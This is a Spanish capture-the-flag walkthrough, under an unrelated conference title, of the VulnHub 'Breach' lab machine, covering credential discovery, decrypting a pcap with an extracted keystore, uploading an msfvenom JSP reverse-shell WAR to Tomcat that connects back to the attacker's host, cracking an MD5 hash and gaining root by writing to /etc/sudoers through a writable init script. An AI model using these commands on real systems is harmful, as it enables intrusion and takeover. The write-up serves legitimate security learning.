SalmorejoTech 2024 - Spring Boot <3 TestcontainersSalmorejoTech 2024 - Spring Boot <3 Testcontainers
SalmorejoTech 2024 - Spring Boot <3 Testcontainers
 

Solucion reto breach

  • 1. Me he picado con esto de los retos, así que he decidido buscar otra máquina para darle cera. En este caso la máquina se llama Breach y es el mismo formato, un OVA que puedes montar rápidamente en VirtualBox. Lo primero que nos dice en el fichero “readme” es que la máquina ya viene con una IP prefijada y que debes ponerla en host only (“adaptador solo anfitrión” en VirtualBox si está en castellano) y obviamente, lo mismo para la máquina que uses para atacar. En mi caso una Kali en la que configuro así. ifconfig eth0 192.168.110.141 netmask 255.255.255.0 Y hago un ping a la IP de la máquina breach para ver que existe comunicación. Pues ya podemos empezar. Lo primero siempre es lanzar un nmap para ver que puertos tiene abiertos y que servicios corriendo. La máquina tiene abiertos chopocientosmil puertos -de hecho se ha pegado más de 20 min escaneando- pero veo que el puerto 80 está disponible… veamos que esconde xD.
  • 2. Lo que sale es un señor tomando una kaipirinha o algo similar y un texto que nos dice, resumiendo, que la empresa Initech ha sido comprometida y un empleado descontento les ha dejado un regalito. Si miramos como de costumbre el código, en rojo veo una cadena que me llama poderosamente la atención. Vamos a pasarla por el decoder de base64 de Burp a ver que nos devuelve. Estaba “doblemente encodeado”, pero al final aparece algo, tiene pinta de ser un juego de usuario contraseña. pgibbons:damnitfeel$goodtobeagang$ta Seguimos con las buenas costumbres y le damos caña con el spider. Y resulta que vamos encontrando cosas. De momento tenemos un frontal con un cms en el que existe un login. Probemos por si acaso con las credenciales que hemos obtenido. Pues parece que ha habido suerte a la primera, estamos dentro. En la siguiente imagen se puede ver que hay 3 mensajes. Vamos a ver si arrojan algo de luz.
  • 3. Pues esta vez estoy teniendo suerte. Accedo a la ruta que comenta el colega y… Tenemos un fichero descargado y por lo que dice el correo parece ser que es un certificado. Vuelvo a mirar los correos y veo uno que me hace gracia… Pinchando en “banners” en el menú de la izquierda, me encuentro con un listado de directorios. Pues nada, nos toca ir abriendo uno a uno a ver que podemos sacar. Vistos todos, a priori parece que no hay nada importante, no obstante me quedo con la ruta por si hubiese que volver. Como nota, sabemos que corre un Apache 2.4.7 xD. http://192.168.110.140/impresscms/modules/banners/ Lo mismo me ocurre al acceder a “profile”.
  • 4. Me topo con una ruta en la que puedo descargar un fichero .swf (flash) y que obviamente me guardo por si acaso. Tras probar a abrir el fichero y a pasarlo a otros formatos de video sin éxito (parece que o está corrupto o no es en realidad un .swf) decido dejarlo de momento para no perder más tiempo. Sigo buscando y abriendo todos los links que veo, hasta que encuentro un fichero en el perfil de Peter.
  • 5. Al entrar me da acceso a un fichero .pcap que descargo. Si leemos el correo nos dice que no puede leer el .pcap a pesar de sus conocimientos de C|EH jajaja… Al abrir el fichero .pac con Wireshark, lo único que se ve es mogollón de datos cifrados. Está claro que el contenido está cifrado y que el fichero que descargamos al princio es la key. En este punto me vuelvo bastante loco porque no sé cómo seguir, así que a buscar info en google de como importar a wireshark el certificado. Resulta que el fichero descargado es un repositorio de certificados de seguridad en Java… no comment xD. Después de mucho, pero mucho buscar, encuentro un artículo -en perfecto inglés- de cómo hacer el proceso (esto de nivel medio no tiene nada xD). En realidad no de cómo hacer el proceso, si no de la herramienta necesaria para que puedas hacerlo. Después de leer el manual de la herramienta keytool y probar 84.976 veces, di con ello.
  • 6. keytool -importkeystore -srckeystore keystore -destkeystore keystore.p12 -deststoretype PKCS12 -srcalias tomcat -deststorepass tomcat -destkeypass tomcat La contraseña es tomcat, ya nos daba la respuesta en el mail jeje. Total, que todo esto solo era para crea un fichero .p12 y ahora tenemos que sacar el certificado. Ea, a buscar otro rato en google. Después de más de dos horas investigando y probando comandos en la consola, el resultado es este. keytool -importkeystore -srckeystore keystore -destkeystore keystore.p12 -deststoretype PKCS12 -srcalias tomcat -deststorepass tomcat -destkeypass tomcat (pass: tomcat) openssl pkcs12 -in keystore.p12 -out key.pem (en todas las preguntas pass: tomcat) Ahora sí, volvemos a abrir Wireskhar, cargamos el .pcap y vamos a “edit -> preferences -> protocols -> ssl y ahí agregamos el certificado con los parámetros que vemos en la imagen.
  • 7. Seguro que desde Wireshark se pueden ver las credenciales, pero ahora no atino y tardo menos haciéndolo desde Burp. Hemos visto que aparece una ruta, /_M@nag3Me/html/ y unas credenciales: tomcat:Tt5D8F(#!*u=G)4m7zB Voy a verificar que hay en ese puerto, aunque ya con la ruta creo que queda claro. Revisando Wireskhark veo otro paquete que me llama la atención. Y viendo la respuesta del servidor, me da la impresión de que ha habido una subida de webshell y una ejecución de comandos. No soy un experto, pero a las pruebas me remito xD.
  • 8. Me ha costado bastante llegar hasta aquí, de hecho mucho más de lo que esperaba, me ha retrasado muchísimo la parte del certificado, hay que darle un 10 al creador de la máquina. Si accedo a https://192.168.110.140:8443/_M@nag3Me/html/ me salta un login. Vamos a probar a meter el juego de user/password que he obtenido con WiresHark. Otra vez atascado , estoy más perdido que un cangrejo una pista de tenis. Llegado este punto estoy por tirar la toalla y pasar de esta máquina, llevo muchas horas perdidas y no sé qué hacer… Quizá si los atacantes subieron una webshell yo podría hacer lo mismo. Manos a la obra. Esta vez uso Burp con la extensión CO2 para crear una webshell para subirla al Tomcat. msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.110.142 LPORT=2222 -f war > shellok.war Una vez que la tenemos creada, debemos subirla a la parte de tomcat que cogimos con Wireshark. Una vez allí, en la parte que pone “WAR file to deploy” le damos a browse, vamos al directorio donde hemos creado la webshell y le damos a aceptar y a “deploy”. Podemos verlo en la siguiente imagen.
  • 9. Automáticamente nos la “arranca” (si nos fijamos en la imagen anterior, se ve que “start” no está subrayado). Vamos a la máquina Kali y lo ejecutamos netcat con los parámetros -lvp. Se quedará esperando y solo nos queda llamarla desde IP/shellok. Bien, pues ya tenemos la webshell funcionando. Veamos qué podemos hacer. De momento, igual que hicieron los atacantes, ejecutamos el comando “id” y vemos lo siguiente. Como hicimos en la máquina de Mr Robot, nos hacemos una Shell “mejorada”. Se supone que podré escalar privilegios con la cuenta de “blumberg” o con la de “milton”, pero claro, donde está la contraseña… De nuevo estoy perdido, llevo demasiadas horas con esta máquina como para dejarlo ahora, así que lo mejor será repasar otra vez todo desde el principio. Y es que cuando abrí por primera vez la web por la IP 192.168.110.140 lo único que había era la imagen del colega en la playa. Entonces me vino la luz y se me ocurrió que quizá hubiese algún tipo de información en la imagen a modo de stegano.
  • 10. Mi gozo en un pozo!! Que leches pasa aquí, que me estoy dejando?? Revisemos el código de la página principal. Si es que no hay nada como leer! Lo tenía delante de mis ojos. Revisando cada link, lo único que se ven son dos imágenes, la vuelta a la web principal y el acceso a CMS. ¿Será la contraseña el nombre de la grapadora? Demasiado fácil, veamos. Como suponía no hay nada… probaré de nuevo las imágenes con “exiftool”
  • 11. Pues nada, ni la una ni la otra, esto ya roza lo irracional xD. Mierda! Resulta que pinchando en la imagen de http://192.168.110.140/initech.html aparece otra imagen. ¿Será esta? Tiene buena pinta, esta tiene un comentario con la palabra “coffeestains”. Vamos a probarlo con las cuentas a ver… Ohhhhhhhhh si!!!! Veamos qué es lo último que hizo el usuario
  • 12. Veamos que tiene el script. Pues parece que borra la información cada 3 minutos. Vamos a ver que hay en la carpeta Después de mirar a fondo todos los directorios y sus ficheros creo que no hay nada que merezca la pena. Madre mía, esto es desesperante, voy a ver si puedo acceder con el otro usuario por si hubiese algo que ver. Pues nada, después de probar las contraseñas que he obtenido, no tengo nada. Veamos que hay corriendo en la máquina con un ps aux por si revelase algo. Lo único que me llama la atención y que pueda cuadrar es el servicio de mysql. Después de probar de nuevo todas las credenciales y palabras que se me han ocurrido, el gato ha pasado por encima del teclado y resulta que no tiene contraseña (el mismo gato que pisa siempre la comilla xD). Gracias a mi querido Mario y sus clases de mysql con una pequeña consulta… Qué fácil es todo cuando estás dentro del motor de la bases de datos jeje. Ya tenemos la pass hasheada de milton: 6450d89bd3aff1d893b85d3ad65d2ec2
  • 13. Crakeamos ese hash (md5) y obtenemos como resultado “thelaststraw” Resulta que milton es miembro del grupo “adm” y rebuscando en modo desesperación “ON” encontré un script que se ejecuta en el “init.d” y el usuario milton es capaz de escribirlo. Gracias a mi compañero Rodri que me dijo como poder escribir dentro. Con: echo "echo 'milton ALL=(ALL) ALL' > /etc/sudoers" > /etc/init.d/portly.sh Nos convertimos en root. He de reconocer que en esta parte hice una pequeña trampa, tuve que reiniciar la máquina de manera manual porque desde la kali era incapaz. Una vez reiniciada la máquina, y ya estando milton en el fichero sudoers, nos hacemos root con “sudo su”. El final ha sido lo más fácil, para encontrar el flag solo tenías que hacer un ls -lha y un cat al fichero “.flag.txt”. El problema ha sido llegar aquí xD. Agradecimientos:  A Rodri por darme luz cuando estaba a punto de dejarlo.  Al creador de la máquina @mrb3n813 (aunque no sé si darle una abrazo o 2 yoyas xD). Enlaces de ayuda: https://www.vulnhub.com/entry/breach-1,152/ https://pentestlab.wordpress.com/2012/08/26/using-metasploit-to-create-a-war-backdoor/ https://www.tbs-certificates.co.uk/FAQ/en/627.html#volet http://packetpushers.net/using-wireshark-to-decode-ssltls-packets/ *Nota: Para mi esta máquina ha sido muy muy difícil, eso sí, lo que he aprendido en consecuencia, creo que merece la pena xD.